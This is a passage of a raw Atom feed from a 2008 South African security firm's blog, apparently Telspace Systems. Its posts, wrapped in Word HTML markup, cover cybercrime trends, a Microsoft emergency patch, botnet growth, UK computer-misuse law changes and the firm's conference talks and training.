5.4pt 0cm 5.4pt;  mso-para-margin:0cm;  mso-para-margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:10.0pt;  font-family:"Times New Roman";  mso-ansi-language:#0400;  mso-fareast-language:#0400;  mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal  {mso-style-parent:"";  margin:0cm;  margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:12.0pt;  font-family:"Times New Roman";  mso-fareast-font-family:"Times New Roman";  mso-ansi-language:ES;  layout-grid-mode:line;} @page Section1  {size:612.0pt 792.0pt;  margin:72.0pt 90.0pt 72.0pt 90.0pt;  mso-header-margin:36.0pt;  mso-footer-margin:36.0pt;  mso-paper-source:0;} div.Section1  {page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable  {mso-style-name:"Table Normal";  mso-tstyle-rowband-size:0;  mso-tstyle-colband-size:0;  mso-style-noshow:yes;  mso-style-parent:"";  mso-padding-alt:0cm 5.4pt 0cm 5.4pt;  mso-para-margin:0cm;  mso-para-margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:10.0pt;  font-family:"Times New Roman";  mso-ansi-language:#0400;  mso-fareast-language:#0400;  mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:50%;"  lang="EN-GB" &gt;Fig.1 – Stock market evolutions (Sep 1 to Oct 9) – source: moneycentral.msn.com&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_XOVFBhYwjwI/SQl2fCMCIFI/AAAAAAAAABU/FawkPVdMR8c/s1600-h/malware2.JPG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 219px;" src="http://2.bp.blogspot.com/_XOVFBhYwjwI/SQl2fCMCIFI/AAAAAAAAABU/FawkPVdMR8c/s320/malware2.JPG" alt="" id="BLOGGER_PHOTO_ID_5262867915094499410" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal  {mso-style-parent:"";  margin:0cm;  margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:12.0pt;  font-family:"Times New Roman";  mso-fareast-font-family:"Times New Roman";  mso-ansi-language:ES;  layout-grid-mode:line;} @page Section1  {size:612.0pt 792.0pt;  margin:72.0pt 90.0pt 72.0pt 90.0pt;  mso-header-margin:36.0pt;  mso-footer-margin:36.0pt;  mso-paper-source:0;} div.Section1  {page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable  {mso-style-name:"Table Normal";  mso-tstyle-rowband-size:0;  mso-tstyle-colband-size:0;  mso-style-noshow:yes;  mso-style-parent:"";  mso-padding-alt:0cm 5.4pt 0cm 5.4pt;  mso-para-margin:0cm;  mso-para-margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:10.0pt;  font-family:"Times New Roman";  mso-ansi-language:#0400;  mso-fareast-language:#0400;  mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  lang="EN-GB" &gt;&lt;span style="font-size:50%;"&gt;Fig.2 – Threat evolutions with key highlights (Sep 1 to Oct 9) – source: PandaLabs&lt;/span&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  lang="EN-GB" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:70%;"&gt;&lt;span style="font-family:georgia;"&gt;According to Panda Security, there is an increase in adware and there has been a dramatic surge of fake anti-virus software scams lately. &lt;/span&gt;  &lt;span style="font-family:georgia;"&gt;Now is the time to be more vigilant and more suspicious than ever before. It is evident that cybercriminals will stop at nothing to get your money, especially in desperate situations. Please be careful!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:Arial;font-size:10;"  lang="EN-GB" &gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  lang="EN-GB" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-7455183782097143701?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/7455183782097143701/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=7455183782097143701' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7455183782097143701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7455183782097143701'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/10/cybercrime-rises-as-markets-fall.html' title='Cybercrime rises as markets fall'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_XOVFBhYwjwI/SQl5BrOwd-I/AAAAAAAAABs/iiHGL5kGRHQ/s72-c/market2.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-3651195730855002080</id><published>2008-10-24T14:37:00.003+02:00</published><updated>2008-10-27T09:37:18.526+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Classic FM'/><category scheme='http://www.blogger.com/atom/ns#' term='Google'/><category scheme='http://www.blogger.com/atom/ns#' term='events'/><category scheme='http://www.blogger.com/atom/ns#' term='Microsoft'/><title type='text'>Microsoft’s emergency and Google’s malware</title><content type='html'>This was a pretty bad week for the big guys as Microsoft and Google both came under a negative spotlight.&lt;br /&gt;&lt;br /&gt;Microsoft had to release an &lt;a href="http://www.news24.com/News24/Technology/News/0,,2-13-1443_2415179,00.html"&gt;emergency patch&lt;/a&gt; for a certain vulnerability that allows an internet worm to spread and makes remote execution possible.&lt;br /&gt;&lt;br /&gt;It has been flagged as critical for users of Windows 2000, XP and Server 2003 and "important" for Windows Server 2008 and Windows Vista users.&lt;br /&gt;&lt;br /&gt;Google was an inadvertent &lt;a href="http://www.theregister.co.uk/2008/10/23/google_safe_browsing/"&gt;malware distributor&lt;/a&gt; for three infected sites, namely xlovelygirls.com, paincult.com, and iteenzy.com.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Local events&lt;/span&gt;&lt;br /&gt;There are a couple of security-related events coming up locally for those that may be interested:&lt;br /&gt;&lt;br /&gt;Cyber Crime Africa Summit&lt;br /&gt;Hotel Apollo, Johannesburg&lt;br /&gt;10-12 November&lt;br /&gt;&lt;br /&gt;Practicing Innovation in Digital Forensics Management&lt;br /&gt;Balalaika Hotel, Johannesburg&lt;br /&gt;12-13 November&lt;br /&gt;&lt;br /&gt;Security Africa Summit 2008&lt;br /&gt;Balalaika Hotel, Johannesburg&lt;br /&gt;26-28 November&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Last but not least&lt;/span&gt;&lt;br /&gt;Telspace is hotting up the media this week! You can catch a glimpse of the lesser-spotted Charlie on &lt;a href="http://www.itweb.co.za/services/subscribe/default.asp"&gt;ITWeb’s Security Week&lt;/a&gt; newsletter today, and catch Dino C on Classic FM talking about cybercrime later tonight. Tune in to 102.7fm between 7 and 8pm!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-3651195730855002080?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/3651195730855002080/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=3651195730855002080' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3651195730855002080'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3651195730855002080'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/10/microsofts-emergency-and-googles.html' title='Microsoft’s emergency and Google’s malware'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5080711608663138213</id><published>2008-10-14T17:09:00.003+02:00</published><updated>2008-10-14T17:15:31.123+02:00</updated><title type='text'>SecTor 2008</title><content type='html'>This year’s &lt;a href="http://www.sector.ca"&gt;SecTor&lt;/a&gt; was simply amazing and had a great turn out. It featured a number of great talks by presenters such as &lt;a href="http://johnny.ihackstuff.com/"&gt;Johnny Long&lt;/a&gt; who discussed “no-tech hacking” and &lt;a href="http://www.metasploit.com/"&gt;HD Moore&lt;/a&gt; on "MetaSploit Prime". Everything was extremely well organised by the very accommodating SecTor team.&lt;br /&gt;&lt;br /&gt;Our training went great, and we would like to thank everyone who attended our training and for their &lt;a href="http://blogs.technet.com/canitpro/archive/2008/10/10/sector-wrap-up.aspx"&gt;feedback&lt;/a&gt;. Last but not least, a huge thanks to Brad '&lt;a href="http://www.renderlab.net/"&gt;RenderMan&lt;/a&gt;' Haines for helping out with the training!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5080711608663138213?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5080711608663138213/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5080711608663138213' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5080711608663138213'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5080711608663138213'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/10/sector-2008.html' title='SecTor 2008'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5453141550961942722</id><published>2008-10-14T12:45:00.002+02:00</published><updated>2008-10-14T12:52:05.551+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wi-Fi'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='wireless'/><title type='text'>Wireless hacking gets more interesting…</title><content type='html'>&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal  {mso-style-parent:"";  margin:0cm;  margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:12.0pt;  font-family:"Times New Roman";  mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink  {color:blue;  text-decoration:underline;  text-underline:single;} a:visited, span.MsoHyperlinkFollowed  {color:purple;  text-decoration:underline;  text-underline:single;} @page Section1  {size:612.0pt 792.0pt;  margin:72.0pt 90.0pt 72.0pt 90.0pt;  mso-header-margin:36.0pt;  mso-footer-margin:36.0pt;  mso-paper-source:0;} div.Section1  {page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable  {mso-style-name:"Table Normal";  mso-tstyle-rowband-size:0;  mso-tstyle-colband-size:0;  mso-style-noshow:yes;  mso-style-parent:"";  mso-padding-alt:0cm 5.4pt 0cm 5.4pt;  mso-para-margin:0cm;  mso-para-margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:10.0pt;  font-family:"Times New Roman";  mso-ansi-language:#0400;  mso-fareast-language:#0400;  mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;Russian hackers have discovered a mode to accelerate Wi-Fi decryption by using an NVIDIA graphics card, although no one seems to be clear which one is being used.&lt;br /&gt;&lt;br /&gt;Apparently, it cracks passwords much faster than the usual methods. Although some sources cite that these type of new hacking techniques focused on wireless technology could see a move back to a wired network connections, I sincerely doubt that.&lt;br /&gt;&lt;br /&gt;The nature of the technological advancement beast ensures that we are always moving in a forward direction – and never backwards. Besides, people tend to ignore security issues where convenience plays a factor.&lt;br /&gt;&lt;br /&gt;In any case, suggestions are being made to apply tighter VPN controls, so you can always start there.&lt;br /&gt;&lt;br /&gt;If anyone is interested in learn more about wireless hacking, you can contact me on &lt;a href="mailto:ilva@telspace.co.za"&gt;ilva@telspace.co.za&lt;/a&gt; for more details on Telspace’s Bluetooth and Wireless 101 training.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5453141550961942722?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5453141550961942722/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5453141550961942722' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5453141550961942722'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5453141550961942722'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/10/wireless-hacking-gets-more-interesting.html' title='Wireless hacking gets more interesting…'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-743563306424362934</id><published>2008-09-30T16:21:00.005+02:00</published><updated>2008-09-30T17:04:07.427+02:00</updated><title type='text'>Crime and punishment</title><content type='html'>Things have pretty quiet locally, it seems – on the news front at least. A few bits of good news from overseas, though.&lt;br /&gt;&lt;br /&gt;The UK has issued an &lt;a href="http://www.theregister.co.uk/2008/09/30/uk_cybercrime_overhaul/"&gt;update&lt;/a&gt; to its Computer Misuse Act. First off, the maximum penalty for unauthorised access to a computer system has been changed from six months to two years imprisonment. Here’s to hoping that will deter would-be criminals even further.&lt;br /&gt;&lt;br /&gt;Also, denial of service attacks (DoS) have been declared a criminal offence – with miscreants looking at up to ten years in prison – so you better off gaining unlawful access ;-P.&lt;br /&gt;&lt;br /&gt;Finally, distributing hacking tools for criminal intent has been declared a punishable offense. I am quite surprised it wasn’t already!&lt;br /&gt;&lt;br /&gt;On that note, the US has just passed a bill that significantly increases the penalties relating to &lt;a href="http://www.infoworld.com/article/08/09/29/IP_piracy_bill_passed_by_US_Congress_1.html?source=rss&amp;amp;url=http://www.infoworld.com/article/08/09/29/IP_piracy_bill_passed_by_US_Congress_1.html"&gt;copyright infringement&lt;/a&gt;, although there has been major debate about it already.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 255, 153);"&gt;Gartner says&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A recent presentation from a Gartner executive brought up the issue about mobile security. Although his statements are nothing new, John Girard, a Gartner vice president is again reminding organisations that security risks are rising as &lt;a href="http://www.infoworld.com/article/08/09/29/Security_risks_rise_as_smartphones_become_smarter_1.html?source=rss&amp;amp;url=http://www.infoworld.com/article/08/09/29/Security_risks_rise_as_smartphones_become_smarter_1.html"&gt;smartphones become even smarter&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;He did have some very good advice, though, “Data on devices should be encrypted, proper identity and access controls should be implemented and intrusion prevention systems should used to ensure that rogue devices don't access sensitive information,” he said.&lt;br /&gt;&lt;br /&gt;He also told delegates at the IT Security Summit in London yesterday that Gartner is predicting that wireless ID theft and phishing attempts targeting mobile devices will become more and more prevalent throughout next year.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-743563306424362934?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/743563306424362934/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=743563306424362934' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/743563306424362934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/743563306424362934'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/09/crime-and-punishment.html' title='Crime and punishment'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-4789776578396202913</id><published>2008-09-19T17:17:00.001+02:00</published><updated>2008-09-19T17:19:08.905+02:00</updated><title type='text'>Be proactive – or walk the plank</title><content type='html'>Some of the latest research released by Frost &amp;amp; Sullivan shows that the security assessment industry is doing pretty hot. According to a recent article on &lt;a href="http://www.itweb.co.za/sections/networking/2008/0809161042.asp?S=Security&amp;amp;A=SEC&amp;amp;O=FRGN"&gt;ITWeb&lt;/a&gt;, the global vulnerability assessment products market earned revenue of $297.5 million in 2007, and estimates this to more than triple by 2014.&lt;br /&gt;&lt;br /&gt;Although this is good news for the security industry and just about everyone else who has private information floating around on other people’s networks, we find that South Africa is still meeting all this with a bit of resistance. Why, though?&lt;br /&gt;&lt;br /&gt;The answer is quite a simple one – assessments are becoming a regulatory requirement from many countries’ governments. And this simply does not apply to us here in deep south of Africa…. Well, as of yet, at least.&lt;br /&gt;&lt;br /&gt;There is a wonderful thing called the Protection of Personal Information Bill that will make a big difference in all of our privacy once it is passed as an Act. And companies are actually being advised to prepare for it properly now – because it will come into effect in the next few years.&lt;br /&gt;&lt;br /&gt;The way it will influence the security assessment industry locally, for instance, is by forcing companies to not only ensure that all their client data is under the virtual version of Fort Knox, but that they have regular assessments done. As in, on a regular basis. Forever and ever.&lt;br /&gt;&lt;br /&gt;However, this does not mean that companies can just relax in the mean time and wait for the Act to be born. Companies need to be proactive about this – those of you that take the initiative NOW to secure your corporate environment and to set up regular audits, will be way ahead of your competitors when the Act comes into effect. And possibly even avoid a jail sentence.&lt;br /&gt;&lt;br /&gt;As soon as it becomes law, companies might not even be granted a grace period to ensure their security policies and procedures are in place, either. This means, they may be treading on illegal ground from day zero.&lt;br /&gt;&lt;br /&gt;And don’t think you can easily pass under the radar – the Act will have its very own Big Brother in the form of a dedicated Commission. And although a set fine has not yet been established, you can look at about 12 months if you’re not properly prepared. And, if you hinder, obstruct or unduly influence the Commission, you can land yourself in jail for 10 years.&lt;br /&gt;&lt;br /&gt;Have an awesome weekend – and ponder on it will ya! :-)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-4789776578396202913?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/4789776578396202913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=4789776578396202913' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4789776578396202913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4789776578396202913'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/09/be-proactive-or-walk-plank.html' title='Be proactive – or walk the plank'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5255728069934984065</id><published>2008-09-16T22:00:00.006+02:00</published><updated>2008-09-16T22:18:37.879+02:00</updated><title type='text'>OMG, Telspace goes to Canada</title><content type='html'>Just a short blog post to let everyone know that Telspace Systems will be presenting at SecTor in Canada during early October 2008. Our talk will be based on hacking internal proxy servers, more details can be read up at &lt;a href="http://www.sector.ca"&gt;www.sector.ca&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Telspace Systems is also going to be doing training at SecTor this year. Focusing on Bluetooth and Wireless hacking. Our course already has many students signed up, so we would appreciate it if you booked as soon as possible to miss out on the opportunity! It's going to be fantastic.&lt;br /&gt;&lt;br /&gt;We are really looking forward to this awesome event again. If you are from anywhere near the region or you are attending SecTor, pop in and say hi!&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.sector.ca/"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 405px;" src="http://www.sector.ca/ads/SecTor2008_655x118(dark).jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;P.S Telspace Systems is hiring again, so give us a call if you think you have what it takes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5255728069934984065?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5255728069934984065/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5255728069934984065' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5255728069934984065'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5255728069934984065'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/09/omg-telspace-goes-to-canada.html' title='OMG, Telspace goes to Canada'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-8057332902597113735</id><published>2008-09-12T17:11:00.005+02:00</published><updated>2008-09-12T17:27:51.691+02:00</updated><title type='text'>Zombie networks go bos</title><content type='html'>There has been a dramatic increase in the number of zombie networks cropping up lately. Recent metrics by the &lt;a href="http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.BotCount90-Days"&gt;Shadowserver Foundation&lt;/a&gt; shows that in the last three months botnet numbers have quadrupled. Although strangely enough, there seems to be no accompanying increase in spam levels.&lt;br /&gt;&lt;br /&gt;According to BBC News, "In June 2008 Shadowserver Foundation knew about more than 100,000 machines that were part of a botnet. By the end of August this figure had exceeded 450,000 machines."&lt;br /&gt;&lt;br /&gt;Reason for this hectic spike are not clear, but there are many theories floating around the net. According to the &lt;a href="http://isc.sans.org/diary.html?storyid=4963"&gt;SANS Internet Storm Centre&lt;/a&gt;, it may be more than a co-incidence that the dramatic rise in these networks is more or less parallel with the massive SQL injection attacks we experienced recently.&lt;br /&gt;&lt;br /&gt;It is also being said that because it happened during schools holidays in the USA, it could just be due to bored kids. Maybe all the cool kids are doing it... but more than likely it is due to a combination of factors, rather than a specific one.&lt;br /&gt;&lt;br /&gt;Whatever the reason behind the huge swell of compromised machines, users should more than ever before be vigilant with their security. Patch, patch, patch, and don't click on weird stuff... it can never be stressed enough.&lt;br /&gt;&lt;br /&gt;Also, just a quick mention that our Hands on Hacking Unlimited course with Zone-h has been postponed until the 11th and 12th of November. If you have not yet sent in a booking form, please do so – it's gonna be awesome.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.telspace.co.za/training-004.php"&gt;&lt;img style="cursor: pointer;" src="http://1.bp.blogspot.com/_XOVFBhYwjwI/SMqKLtyav5I/AAAAAAAAAAo/0zWjAHLAkwM/s320/telspace_oct.png" alt="" id="BLOGGER_PHOTO_ID_5245156649900621714" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-8057332902597113735?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/8057332902597113735/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 